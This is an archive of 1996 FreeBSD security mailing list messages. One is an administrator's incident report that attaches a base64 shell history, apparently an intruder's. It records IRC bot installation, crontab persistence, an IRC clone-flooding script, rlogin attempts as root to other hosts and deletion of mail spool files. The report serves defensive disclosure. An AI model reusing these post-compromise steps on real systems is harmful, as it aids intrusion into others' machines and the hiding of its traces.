From owner-freebsd-security Sun Jul 14 00:28:46 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA25896 for security-outgoing; Sun, 14 Jul 1996 00:28:46 -0700 (PDT) Received: from gaja.ipan.lublin.pl (gaja.ipan.lublin.pl [193.59.19.151]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id AAA25812 for ; Sun, 14 Jul 1996 00:28:23 -0700 (PDT) Received: (from henryk@localhost) by gaja.ipan.lublin.pl (8.6.12/8.6.12) id JAA15321 for freebsd-security@FreeBSD.org; Sun, 14 Jul 1996 09:30:28 +0200 From: Henryk Sobczuk Message-Id: <199607140730.JAA15321@gaja.ipan.lublin.pl> To: freebsd-security@FreeBSD.org Date: Sun, 14 Jul 1996 09:30:26 +0200 (MET DST) Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk dupa X-Mailer: ELM [version 2.4ME+ PL15 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 28 subscribe freebsd-security From owner-freebsd-security Sun Jul 14 05:41:46 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id FAA28437 for security-outgoing; Sun, 14 Jul 1996 05:41:46 -0700 (PDT) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.eu.org [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id FAA28430 for ; Sun, 14 Jul 1996 05:41:41 -0700 (PDT) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.eu.org [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id OAA05637; Sun, 14 Jul 1996 14:41:31 +0200 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id OAA30630; Sun, 14 Jul 1996 14:41:03 +0200 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.Alpha.5/keltia-uucp-2.8) id NAA04648; Sun, 14 Jul 1996 13:47:23 +0200 (MET DST) From: Ollivier Robert Message-Id: <199607141147.NAA04648@keltia.freenix.fr> Subject: Re: applying patches to perl5 To: jasonh@cei.net Date: Sun, 14 Jul 1996 13:47:23 +0200 (MET DST) Cc: freebsd-security@freebsd.org In-Reply-To: <199607140015.TAA09053@major.cei.net> from Jason Hudgins at "Jul 12, 96 07:20:28 pm" X-Operating-System: FreeBSD 2.2-CURRENT ctm#2220 X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk It seems that Jason Hudgins said: > I'm running FreeBSD 2.1.0 ...with the perl 5 port installed... > I am trying to patch the perl-setuid whole with no success. Get Perl5.003 from any CPAN site and install it instead. You could get the 2.2-CURRENT /usr/ports/lang/perl5/* tree but there are a few differences betwwen 2.1.1's bsd.port.mk and 2.2-CURRENT one... -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 2.2-CURRENT #14: Thu Jul 11 22:38:57 MET DST 1996 From owner-freebsd-security Sun Jul 14 23:52:51 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA06490 for security-outgoing; Sun, 14 Jul 1996 23:52:51 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA06475; Sun, 14 Jul 1996 23:52:47 -0700 (PDT) Received: (from jbhunt@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id XAA16398; Sun, 14 Jul 1996 23:52:43 -0700 (PDT) Date: Sun, 14 Jul 1996 23:52:43 -0700 (PDT) From: jbhunt To: freebsd-security-notification@freebsd.org cc: freebsd-security@freebsd.org, root@mercury.gaianet.net Subject: New EXPLOIT located! Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="0-463065691-837413563=:1806" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --0-463065691-837413563=:1806 Content-Type: TEXT/PLAIN; charset=US-ASCII Ok, for almost 3 weeks now we at Gaianet have been tracking root hackers around our box. FINALLY, today at about 3 pm one of them made a BIG BIG mistake. Fortunately, for us I was around to watch what happened and kill the user before he was able to erase his history files and the exploit itself. So here are the files necessary to fix whatever hole this exploits. We run Freebsd Current so it obviously makes most freebsd systems vulnerable to a root attack. I appreciate any help you can offer. John SysAdmin Gaianet --0-463065691-837413563=:1806 Content-Type: TEXT/PLAIN; charset=US-ASCII; name=".historybgreg" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: IyswODM3MjMzMDA3DQpscw0KIyswODM3MjMzMDA3DQpwcyB4DQojKzA4Mzcy MzMwMDcNCmNyb250YWIgLWUNCiMrMDgzNzIzMzAwNw0KY3JvbnRhYiAtZQ0K IyswODM3MjMzMDA3DQpscw0KIyswODM3MjMzMDA3DQpybSBib3RjaGsNCiMr MDgzNzIzMzAwNw0KcHMgeA0KIyswODM3MjMzMDA3DQpwcyB4DQojKzA4Mzcy MzMwMDcNCnBzDQojKzA4MzcyMzMwMDcNCmNkIC5LYXJtYTk2DQojKzA4Mzcy MzMwMDcNCmxzDQojKzA4MzcyMzMwMDcNCmJvdGNoaw0KIyswODM3MjMzMDA3 DQpwcw0KIyswODM3MjMzMDA3DQpwaWNvIGJvdGNoaw0KIyswODM3MjMzMDA3 DQpzIHgNCiMrMDgzNzIzMzAwNw0KbHMNCiMrMDgzNzIzMzAwNw0KcHMgeA0K IyswODM3MjMzMDA3DQpjZA0KIyswODM3MjMzMDA3DQpwcw0KIyswODM3MjMz MDA3DQpscw0KIyswODM3MjMzMDA3DQpjZCAuS2FybWE5Ng0KIyswODM3MjMz MDA3DQpscw0KIyswODM3MjMzMDA3DQpwaWNvIEJvdC5TZXQNCiMrMDgzNzIz MzAwNw0KaXJjIE1yUGVuaXMNCiMrMDgzNzIzMzAwNw0KdGVsbmV0IGFsYnls Lmllcy5sdXRoLnNlDQojKzA4MzcyMzMwMDcNCnRlbG5ldCBsaW51cy5hcnRl Y2guc2UNCiMrMDgzNzIzMzAwNw0KbHMNCiMrMDgzNzIzMzAwNw0KY2QgLkth cm1hOTYNCiMrMDgzNzIzMzAwNw0KbHMNCiMrMDgzNzIzMzAwNw0KcGljbyBC b3QuTGV2ZWxzDQojKzA4MzcyMzMwMDcNCmxzDQojKzA4MzcyMzMwMDcNCnBp Y28gQ29tQm90Lmxpc3RzDQojKzA4MzcyMzMwMDcNCnBzIHgNCiMrMDgzNzIz MzAwNw0Ka2lsbCAtIDk3NTcNCiMrMDgzNzIzMzAwNw0Ka2lsIC05IDc1Nw0K IyswODM3MjMzMDA3DQpDb20NCiMrMDgzNzIzMzAwNw0Ka2lsbCAtOSA3NTcN CiMrMDgzNzIzMzAwNw0KQ29tQm90DQojKzA4MzcyMzMwMDcNCnBzIHgNCiMr MDgzNzIzMzAwNw0KcmxvZ2luIC1sIGxzIGxpbnVzLmFydGVjaC5zZQ0KIysw ODM3MjMzMDA3DQpybG9naW4NCiMrMDgzNzIzMzAwNw0KaGVscA0KIyswODM3 MjMzMDA3DQpybG9naW4gLWwgcm9vdCBsaW51cy5hcnRlY2guc2UNCiMrMDgz NzIzMzAwNw0KcmxvZ2luIC1sIHJvb3Qgc3VubnkuYmFobmhvZi5zZQ0KIysw ODM3MjMzMDA3DQpybG9naW4gLWwgbHMgbGludXMuYXJ0ZWNoLnNlDQojKzA4 MzcyMzMwMDcNCnJsb2dpDQojKzA4MzcyMzMwMDcNCnJsb2dpbiBybG9naQ0K IyswODM3MjMzMDA3DQpybG9naW4gLWwgaGVucmlrdyBzdW5ueS5iYWhuaG9m LnNlDQojKzA4MzcyMzMwMDcNCnh4Yw0KIyswODM3MjMzMDA3DQpzc2gNCiMr MDgzNzIzMzAwNw0KcmxvZ2luIGt1YWkuc2UNCiMrMDgzNzIzMzAwNw0KUw0K IyswODM3MjMzMDA3DQpybG9naW4gbGludXMuYXJ0ZWNoLnNlDQojKzA4Mzcy MzMwMDcNCnJsb2dpbiBsaW51cy5hcnRlY2guc2UNCiMrMDgzNzIzMzAwNw0K cmxvZ2luIGFsYnlsLmllcy5sdXRoLnNlDQojKzA4MzcyMzMwMDcNCnJsb2dp biAtdSA5NGItY25iIGFsYnlsLmllcy5sdXRoLnNlDQojKzA4MzcyMzMwMDcN CnJlbG9naW4gLWwgOTRiLWNuYiBhbGJ5bC5pZXMubHV0aC5zZQ0KIyswODM3 MjMzMDA3DQpybG9naW4gLWwgOTRiLWNuYiBhbGJ5bC5pZXMubHV0aC5zZQ0K IyswODM3MjMzMDA3DQp3DQojKzA4MzcyMzMwMDcNCmFkZA0KIyswODM3MjMz MDA3DQpybG9naW4gbGludXMuYXJ0ZWNoLnNlDQojKzA4MzcyMzMwMDcNCnBz IHgNCiMrMDgzNzIzMzAwNw0Ka2lsbCAtOSAyMjYyNA0KIyswODM3MjMzMDA3 DQpraWxsIC05IDIyNjI2DQojKzA4MzcyMzMwMDcNCmxzDQojKzA4MzcyMzMw MDcNCnBzIHgNCiMrMDgzNzIzMzAwNw0KcmxvZ2luIGxpbnVzLmFydGVjaC5z ZQ0KIyswODM3MjMzMDA3DQpybG9naW4gbGludXMuYXJ0ZWNoLnNlOg0KIysw ODM3MjMzMDA3DQpwcw0KIyswODM3MjMzMDA3DQpwcyB4DQojKzA4MzcyMzMw MDcNCnJsb2dpbiBsaW51cy5hcnRlY2guc2UNCiMrMDgzNzIzMzAwNw0Kcmxv Z2luIGxpbnVzLmFydGVjaC5zZQ0KIyswODM3MjMzMDA3DQpybG9naW4gbGlu dXMuYXJ0ZWNoLnNlDQojKzA4MzcyMzMwMDcNCnJsb2dpbiBsaW51cy5hcnRl Y2guc2UNCiMrMDgzNzIzMzAwNw0KcmxvZ2luIGFsYnlsLmllcy5sdXRoLnNl DQojKzA4MzcyMzMwMDcNCnRlbG5ldCBtb3RoZXIua2FqZW4uY29tDQojKzA4 MzcyMzMwMDcNCnRlbG5ldCBtb3RoZXIua2FqZW4uY29tDQojKzA4MzcyMzMw MDcNCmFuZGVyc25vdGVsbmV0IG1vdGhlci5rYWplbi5jb20NCiMrMDgzNzIz MzAwNw0KYW5kZXJzbm8NCiMrMDgzNzIzMzAwNw0KdGVuZXQgbW90aGVyLmth amVuLmNvbQ0KIyswODM3MjMzMDA3DQp0ZWxuZXQgbW90aGVyLmthamVuLmNv bQ0KIyswODM3MjMzMDA3DQp0ZWxuZXQgbW90aGVyLmthamVuLmNvbQ0KIysw ODM3MjMzMDA3DQp0ZWxuZXQgbW90aGVyLmthamVuLnNlDQojKzA4MzcyMzMw MDcNCnRlbG5ldCBrYWplbi5zZQ0KIyswODM3MjMzMDA3DQp0ZWxuZXQgbGlu dXMuYXJ0ZWNoLnNlDQojKzA4MzcyMzMwMDcNCnRlbA0KIyswODM3MjMzMDA3 DQpybG9naW4gbGludXMuYXJ0ZWNoLnNlDQojKzA4MzcyMzMwMDcNCnJsb2dp biBhbGJ5bC5pZXMubHV0aC5zZQ0KIyswODM3MjMzMDA3DQpybG9naW4gbGlu dXMuYXJ0ZWNoLnNlIC1sIGxzDQojKzA4MzcyMzMwMDcNCnRlbG5ldCBmbGFz aC13ZXN0Lmxha2VoZWFkdS5jYQ0KIyswODM3MjMzMDA3DQppcmMNCiMrMDgz NzIzMzAwNw0KaXJjDQojKzA4MzcyMzMwMDcNCmlyYw0KIyswODM3MjMzMDA3 DQppcmMNCiMrMDgzNzIzMzAwNw0Kcw0KIyswODM3MjMzMDA3DQpscw0KIysw ODM3MjMzMDA3DQpscw0KIyswODM3MjMzMDA3DQpwc3gNCiMrMDgzNzIzMzAw Nw0KcHMgeA0KIyswODM3MjMzMDA3DQpwcw0KIyswODM3MjMzMDA3DQp4DQoj KzA4MzcyMzMwMDcNCmlyYyBNYWNTb3VyY0UgaXJjLTIuc3RlbGF0aC5uZXQg NTU1MA0KIyswODM3MjMzMDA3DQp6enoNCiMrMDgzNzIzMzAwNw0KaXJjIE1h Y1NvdXJjRQ0KIyswODM3MjMzMDA3DQppcmMgUXVpY2tUYWtlIGlyYy5rZXJu LmNvbSA2NjY1DQojKzA4MzcyMzMwMDcNCmlyYyBNYWNTT1MgaXJjLmVwaXgu bmV0IDY2NjUNCiMrMDgzNzIzMzAwNw0KaXINCiMrMDgzNzIzMzAwNw0KL2xv YWQgdGV4dGJveC5pcmMNCiMrMDgzNzIzMzAwNw0KaXJjDQojKzA4MzcyMzMw MDcNCmxzDQojKzA4MzcyMzMwMDcNCnBzIHgNCiMrMDgzNzIzMzAwNw0KY2Qg Lkthcm1hOTYNCiMrMDgzNzIzMzAwNw0KbHMNCiMrMDgzNzIzMzAwNw0KcGlj byBib3RjaGsNCiMrMDgzNzIzMzAwNw0KbHMNCiMrMDgzNzIzMzAwNw0KQ29t Qm90DQojKzA4MzcyMzMwMDcNCnBzIHgNCiMrMDgzNzIzMzAwNw0KaXJjIFNv bk9TYXRhbg0KIyswODM3MjMzMDA3DQpscw0KIyswODM3MjMzMDA3DQpwaWNv IGJvdGNoaw0KIyswODM3MjMzMDA3DQpscw0KIyswODM3MjMzMDA3DQpib3Rj aGsNCiMrMDgzNzIzMzAwNw0KcHMgeA0KIyswODM3MjMzMDA3DQpjcm9udGFi DQojKzA4MzcyMzMwMDcNCmNyb250YWIgLWUNCiMrMDgzNzIzMzAwNw0KbHMN CiMrMDgzNzIzMzAwNw0KaXJjDQojKzA4MzcyMzMwMDcNCmlyYw0KIyswODM3 MjMzMDA3DQpwcyB4DQojKzA4MzcyMzMwMDcNCnANCiMrMDgzNzIzMzAwNw0K Y3JvbnRhYiAtZQ0KIyswODM3MjMzMDA3DQppcmMgTWNILSBpcmMua2Vybi5j b20gNjY2NQ0KIyswODM3MjMzMDA3DQphaWwNCiMrMDgzNzIzMzAwNw0KcHMg eA0KIyswODM3MjMzMDA3DQptYWlsDQojKzA4MzcyMzMwMDcNCnJtIGMvdmFy L21haWwvYmdyZWcNCiMrMDgzNzIzMzAwNw0KL3Zhci9tYWlsL2JncmVnDQoj KzA4MzcyMzMwMDcNCnJtIC92YXIvbWFpbC9iZ3JlZw0KIyswODM3MjMzMDA3 DQpjZCAvdmFyL21haWwvYmdyZWcNCiMrMDgzNzIzMzAwNw0KZW0NCiMrMDgz NzIzMzAwNw0Kcm0gL3Zhci9tYWlsL2JncmVnDQojKzA4MzcyMzMwMDcNCmly Yw0KIyswODM3MjMzMDA3DQppcmMgT2xkV2FyZXogaXJjLmtlcm4uY29tIDY2 NjUNCiMrMDgzNzIzMzAwNw0KaXJjIE1vZm8NCiMrMDgzNzIzMzAwNw0KaXJj IE1vb2ZvIGlyYy5tY3MubmV0IDY2NjUNCiMrMDgzNzIzMzAwNw0KcmMgTW9v Zm8gaXJjLmdhdGUubmV0IDY2NjUNCiMrMDgzNzIzMzAwNw0KcmMgTW9vZm8g aXJjLmdhdGUubmV0IDY2NjUNCiMrMDgzNzIzMzAwNw0KaXJjDQojKzA4Mzcy MzMwMDcNCmlyYyBNb29mbyBpcmMuaW9uZXQubmV0DQojKzA4MzcyMzMwMDcN CmlyYyBNb29mbyBpcmMua2Vybi5jb20gNjY2NQ0KIyswODM3MjMzMDA3DQps cw0KIyswODM3MjMzMDA3DQpwaWNvIE5ld01BQ0ZpbGV6X0ZBUS50eHQNCiMr MDgzNzIzMzAwNw0KaXJjIE1vc2VzIGlyYy5nYXRlLm5ldCA2NjY1DQojKzA4 MzcyMzMwMDcNCmlyYw0KIyswODM3MjMzMDA3DQppcmMgR2F5bGluDQojKzA4 MzcyMzMwMDcNCjYNCiMrMDgzNzIzMzAwNw0KaXJjDQojKzA4MzcyMzMwMDcN CmlyYyBHYXlsaW4gaXJjLmtlcm4uY29tIDY2NjUNCiMrMDgzNzIzMzAwNw0K aXJjIE1yRm9vc2UgcGlnbGV0LmNjLnV0ZXhhcy5lZHUgNjY2NQ0KIyswODM3 MjMzMDA3DQp6eGNhcw0KIyswODM3MjMzMDA3DQppcmMgTXJGb29zZSBpcmMu YnJpZGdlLm5ldCA2NjY1DQojKzA4MzcyMzMwMDcNCmlyYyBUaGVIb29kIGly Yy5jcmlzLmNvbSA2NjY1DQojKzA4MzcyMzMwMDcNCmlyYyBNYWRhbSBpcmMu c3B5ZGVyLm9yZyA2NjY1DQojKzA4MzcyMzMwMDcNCmlyYw0KIyswODM3MjMz MDA3DQovDQojKzA4MzcyMzMwMDcNCmlyYyBKdWx1cyBpcmMud2ludGVybmV0 Y29tIDY2NjUNCiMrMDgzNzIzMzAwNw0KaXJjIE1vb2ZvIGlyYy53aW50ZXJu ZXQuY29tIDY2NjUNCiMrMDgzNzIzMzAwNw0KcHMgeA0KIyswODM3MjMzMDA3 DQppcmMgUmVjQ2hlY2sNCiMrMDgzNzIzMzAwNw0KaXJjIFRocmFzaGVkIGly Yy5rZXJuLmNvbSA2NjY1DQojKzA4MzcyMzMwMDcNCmlyYyBUaHJhc2hlZCBp cmMua2Vybi5ybG9naW4gbGludXMuYXJ0ZWNoLnNlDQojKzA4MzQyNjM4NzcN CnJsb2dpbiBhbGJ5bC5pZXMubHV0aC5zZQ0KIyswODM0MjYzODc3DQpybG9n aW4gbGludXMuYXJ0ZWNoLnNlIC1sIGxzDQojKzA4MzQyNjM4NzcNCnRlbG5l dCBmbGFzaC13ZXN0Lmxha2VoZWFkdS5jYQ0KIyswODM0MjYzODc3DQppcmMN CiMrMDgzNDI2Mzg3Nw0KaXJjDQojKzA4MzQyNjM4NzcNCmlyYw0KIyswODM0 MjYzODc3DQppcmMNCiMrMDgzNDI2Mzg3Nw0Kcw0KIyswODM0MjYzODc3DQps cw0KIyswODM0MjYzODc3DQpscw0KIyswODM0MjYzODc3DQpwc3gNCiMrMDgz NDI2Mzg3Nw0KcHMgeA0KIyswODM0MjYzODc3DQpwcw0KIyswODM0MjYzODc3 DQp4DQojKzA4MzQyNjM5MTANCmlyYyBNYWNTb3VyY0UgaXJjLTIuc3RlbGF0 aC5uZXQgNTU1MA0KIyswODM0MjYzOTIwDQp6enoNCiMrMDgzNDI2MzkyNQ0K aXJjIE1hY1NvdXJjRQ0KIyswODM0MjkxMTYxDQppcmMgUXVpY2tUYWtlIGly Yy5rZXJuLmNvbSA2NjY1DQojKzA4MzQyOTI5MDQNCmlyYyBNYWNTT1MgaXJj LmVwaXgubmV0IDY2NjUNCiMrMDgzNDM2NjkyMw0KaXINCiMrMDgzNDM2Njky Ng0KL2xvYWQgdGV4dGJveC5pcmMNCiMrMDgzNDM2NjkyOA0KaXJjDQojKzA4 MzQ0MDcxMzQNCmxzDQojKzA4MzQ0MDcxMzcNCnBzIHgNCiMrMDgzNDQwNzE0 NA0KY2QgLkthcm1hOTYNCiMrMDgzNDQwNzE0NA0KbHMNCiMrMDgzNDQwNzE1 NQ0KcGljbyBib3RjaGsNCiMrMDgzNDQwNzE2OA0KbHMNCiMrMDgzNDQwNzE3 Mw0KQ29tQm90DQojKzA4MzQ0MDcxNzcNCnBzIHgNCiMrMDgzNDQwNzE5Mg0K aXJjIFNvbk9TYXRhbg0KIyswODM0NDA3MzQxDQpscw0KIyswODM0NDA3MzQ5 DQpwaWNvIGJvdGNoaw0KIyswODM0NDA3MzY5DQpscw0KIyswODM0NDA3Mzc1 DQpib3RjaGsNCiMrMDgzNDQwNzM4MA0KcGlyYw0KIyswODM3MjMzMDA3DQpx DQojKzA4MzcyMzMwMDcNCmlyYw0KIyswODM3MjMzMDA3DQppcmMNCiMrMDgz NzIzMzAwNw0KdGVsbmV0IG5ldHZpcnR1YWwuY29tDQojKzA4MzcyMzMwMDcN CnZpcnR1YWwuY29tDQojKzA4MzcyMzMwMDcNCnRlbG5ldCBuZXR2aXJ0dWFs LmNvbQ0KIyswODM3MjMzMDA3DQppcmMgQXNwZWN0XVsgaXJjLnN0ZWFsdGgu bmV0OjY2NjUNCiMrMDgzNzIzMzAwNw0KaXJjIEFzcGVjdF1bIGlyYy51aWMu ZWR1IDY2NjUNCiMrMDgzNzIzMzAwNw0KaXJjIEFzcGVjdF1bIGlyYy5waG9l bml4Lm5ldDo2NjY1DQojKzA4MzcyMzMwMDcNCmlyYw0KIyswODM3MjMzMDA3 DQpseW54IGh0dHA6Ly93d3cuYmx1ZS1jb3cuY29tLw0KIyswODM3MjMzMDA3 DQpjZCAuc2VjcmV0DQojKzA4MzcyMzMwMDcNCmNsb2luZXMucGwNCiMrMDgz NzIzMzAwNw0KbHMNCiMrMDgzNzIzMzAwNw0KY2xvbmVzLnBsDQojKzA4Mzcy MzMwMDcNCi4vY2xvbmVzLnBsDQojKzA4MzcyMzMwMDcNCmNobW9kICt4IGNs b25lcy5wbA0KIyswODM3MjMzMDA3DQpjbG9uZXMucGwNCiMrMDgzNzIzMzAw Nw0KcGVybCBjbG9uZXMucGwNCiMrMDgzNzIzMzAwNw0KcGVybDUuMDAxIGNs b25lcy5wbA0KIyswODM3MjMzMDA3DQpscw0KIyswODM3MjMzMDA3DQpwZXJs IGNsb25lcy5wbA0KIyswODM3MjMzMDA3DQp0ZWxuZXQgYWxmLnVjY3MuZWR1 DQojKzA4MzcyMzMwMDcNCnRlbG5ldCBUcmlTdGF0ZS5UU0VJLksxMi5NUy5V Uw0KIyswODM3MjMzMDA3DQoxNTMuMzcuOTMuNjENCiMrMDgzNzIzMzAwNw0K aXJjIE1hY0ZyaWVuZCBpcmMucGhvZW5peC5uZXQ6NjY2NQ0KIyswODM3MjMz MDA3DQpscw0KIyswODM3MjMzMDA3DQp0YXIgLXh2ZiBLYXJtYTk2LnRhcg0K IyswODM3MjMzMDA3DQp0YXIgLWN2ZiBLYXJtYTk2LnRhciAuS2FybWE5Ng0K IyswODM3MjMzMDA3DQpscw0KIyswODM3MjMzMDA3DQpnemlwIEthcm1hOTYu dGFyDQojKzA4MzcyMzMwMDcNCmxzDQojKzA4MzcyMzMwMDcNCnJtIGMucGwN CiMrMDgzNzIzMzAwNw0KY2QgLnNlY3JldA0KIyswODM3MjMzMDA3DQptdiBj bG9uZXMucGwgZGlja19kb3VibGVyDQojKzA4MzcyMzMwMDcNCmNkDQojKzA4 MzcyMzMwMDcNCmlyYyBNYWNILSBpcmMudm9pY2VuZXQuY29tOjY2NjUNCiMr MDgzNzIzMzAwNw0KaXJjIFF1YXogaXJjLnZvaWNlbmV0LmNvbTo2NjY1DQoj KzA4MzcyMzMwMDcNCmlyYyBNYWNILSBpcmMubmVvc29mdC5jb206NjY2NQ0K IyswODM3MjMzMDA3DQp3aG9hbWkNCiMrMDgzNzIzMzAwNw0KOyBeP2xzDQoj KzA4MzcyMzMwMDcNCmxzDQojKzA4MzcyMzMwMDcNCmlyYy5pb25ldC5uZXQN CiMrMDgzNDQ2MjA3MA0KaXJjIE1vb2ZvIGlyYy5rZXJuLmNvbSA2NjY1DQoj KzA4MzQ0NjI0NjENCmxzDQojKzA4MzQ0NjI0NjgNCnBpY28gTmV3TUFDRmls ZXpfRkFRLnR4dA0KIyswODM0NDYzNTE5DQppcmMgTW9zZXMgaXJjLmdhdGUu bmV0IDY2NjUNCiMrMDgzNDQ2Mzc0OQ0KaXJjDQojKzA4MzQ1MTM5MjENCmly YyBHYXlsaW4NCiMrMDgzNDUxMzk2Ng0KNg0KIyswODM0NTEzOTY5DQppcmMN CiMrMDgzNDUxNDAzMw0KaXJjIEdheWxpbiBpcmMua2Vybi5jb20gNjY2NQ0K IyswODM0NTI3NDk2DQppcmMgTXJGb29zZSBwaWdsZXQuY2MudXRleGFzLmVk dSA2NjY1DQojKzA4MzQ1MzA1NjQNCnp4Y2FzDQojKzA4MzQ1MzA1NzANCmly YyBNckZvb3NlIGlyYy5icmlkZ2UubmV0IDY2NjUNCiMrMDgzNDUzMDczOA0K aXJjIFRoZUhvb2QgaXJjLmNyaXMuY29tIDY2NjUNCiMrMDgzNDUzMDgzNA0K aXJjIE1hZGFtIGlyYy5zcHlkZXIub3JnIDY2NjUNCiMrMDgzNDUzMDg2MA0K aXJjDQojKzA4MzQ1MzA4OTMNCi8NCiMrMDgzNDUzMDkxMA0KaXJjIEp1bHVz IGlyYy53aW50ZXJuZXRjb20gNjY2NQ0KIyswODM0NTMxMDA1DQppcmMgTW9v Zm8gaXJjLndpbnRlcm5ldC5jb20gNjY2NQ0KIyswODM0NTkyNjQwDQpwcyB4 DQojKzA4MzQ1OTI2NzkNCmlyYyBSZWNDaGVjaw0KIyswODM0NjAyMjQzDQpp cmMgVGhyYXNoZWQgaXJjLmtlcm4uY29tIDY2NjUNCiMrMDgzNDYwMjMzNA0K aXJjIFRocmFzaGVkIGlyYy5rZXJuLmNvbSA2NjY1DQojKzA4MzQ2MDI2NzEN CmlyYyBUaHJhc2hlZCBpcmMuaW9uZXQubmV0DQojKzA4MzQ2MDI3MDYNCnhj enh6WGN6eGNaWGlyYw0KIyswODM0NjAyNzExDQppcmMNCiMrMDgzNDYwMjc3 NA0KaXJjIC9zc2VydmVyDQojKzA4MzQ2MDI3NzgNCmlyYyBNcg0KIyswODM0 NjAyODE1DQpkDQojKzA4MzQ2MDY4MTENCmxzDQojKzA4MzQ2MDY4MTYNCnBz IHgNCiMrMDgzNDYwNjgxOQ0KY2QgLmthcm1hOTYNCiMrMDgzNDYwNjgyNQ0K Y2QgLkthcm1hOTYNCiMrMDgzNDYwNjgyOA0KQ29tQm90DQojKzA4MzQ2MDY4 MzUNCnBzIHgNCiMrMDgzNDYxMjMwNg0KdGVsbmV0IHd0ZWxuZXQgd2Fra28u Z2lsLm5ldA0KIyswODM0NjEyMzI0DQp0ZWxuZXQgd2Fra28uZ2lsLm5ldA0K IyswODM0NjM1MjU3DQpjaG1vZCAreCBjbG9uZXMucGwNCiMrMDgzNDYzNTI2 MQ0KbGltaXRzDQojKzA4MzQ2MzUyNjYNCmNsb25lcy5wbA0KIyswODM0NjM2 NzEyDQpybSBjbG9uZXMucGwNCiMrMDgzNDYzNjcxNQ0KXWJ5ZQ0KIyswODM0 NjM2NzE1DQpxdWl0DQojKzA4MzQ2MzY3MTUNCnENCiMrMDgzNDYzNjc0Mg0K cm0gY2xvbmVzcQ0KIyswODM0NzY0NjY1DQp0ZWxuZXQgY25zLm5ldHdvcmth bWVyaWNhLmNvbQ0KIyswODM0NzY1MDc0DQpybG9naW4gbGludXMuYXJ0ZWNo LnNlIC1sIGxzDQojKzA4MzQ3NjUxMzYNCnJsb2cNCiMrMDgzNDc2NTE2MQ0K cmxvZ2luIGxpbnVzLmFydGVjaC5zZSAtbCB0aG9tYXMNCiMrMDgzNDc2NTI3 Mg0KdGVsbmV0IHNjb29ieS50aWFjLm5ldA0KIyswODM0NzY1NjM0DQpscw0K IyswODM0NzY1NjQ2DQpjZCAuS2FybWE5Ng0KIyswODM0NzY1NjU0DQpwcyB4 DQojKzA4MzQ3NjU2NjINCkNvbUJvdA0KIyswODM0NzY1OTAxDQp0ZWxuZXQg c2Nvb2J5LnRpYWMubmV0DQojKzA4MzQ3NjYxOTkNCmN4Y3gNCiMrMDgzNTQ4 NDQ4MA0KY2QgLnNlY3JldA0KIyswODM1NDg0NDk5DQpwZXJsNS4wMDEgY2xv bmVzLnBsDQojKzA4MzU0ODQ1MDQNCmxzDQojKzA4MzU0ODQ1MTQNCmNobW9k ICt4IGNsb25lcy5wbA0KIyswODM1NDg0NTE3DQpscw0KIyswODM1NDg0NTE5 DQpjbG9uZXMucGwNCiMrMDgzNTQ4NDUyNQ0KcGVybCBjbG9uZXMucGwNCiMr MDgzNTQ4NDUzOQ0KcGVybA0KIyswODM1NDg0NTY4DQpwZXJsMTUgY2xvbmVz LnBsDQojKzA4MzU0ODQ1NzMNCnBlcmwgY2xvbmVzLnBsDQojKzA4MzU0ODQ3 ODENCmNobW9kICtwIGNsb25lcy5wbA0KIyswODM1NDg0NzgzDQpjbG9uZXMu cGwNCiMrMDgzNTQ4NDc5MQ0KY2htb2QgLXggY2xvbmVzLnBsDQojKzA4MzU0 ODQ3OTINCmxzDQojKzA4MzU0ODQ3OTYNCmNsb25lcy5wbA0KIyswODM1NDg0 ODAwDQpwZXJsIGNsb25lcy5wbA0KIyswODM1NTU0MTYyDQppcmMgSW1tb3J0 YWwgaXJjLmlvbmV0Lm5ldDo2NjY1DQojKzA4MzU1NTQyMTgNCmlyYw0KIysw ODM1NTU0MjU1DQppcmMgSW1tb3J0YWwgaXJjLmJyaWRnZS5uZXQgNjY2NQ0K IyswODM1NTc2MzA3DQppcmMgZGRkIGlyYy5icmlkZ2UubmV0IDY2NjUNCiMr MDgzNTY2MzA1MQ0KaXJjIEdldEJhY2sgaXJjLmFpcy5uZXQ6NjY2NQ0KIysw ODM1NzQwODcxDQppcmMgR2F0ZUl0IGlyYy5nYXRlLm5ldDo2NjY1DQojKzA4 MzU3NDgzMzANCmlyYyBCZUplc3VzIGlyYy5nYXRlLm5ldDo2NjY1DQojKzA4 MzU3NDkxNDMNCmlyYyBTY2FubmVyIGlyYy5pb25ldC5uZXQ6NjY2NQ0KIysw ODM1NzQ5NTQxDQppcmMNCiMrMDgzNTc0OTU2MQ0KcnZlciBpcmMuDQojKzA4 MzU3NDk1NjMNCnINCiMrMDgzNTc0OTU2NA0KaXJjDQojKzA4MzU3NDk1OTQN CnENCiMrMDgzNTc0OTU5OQ0KaXJjDQojKzA4MzU3NDk2ODkNCmlyYw0KIysw 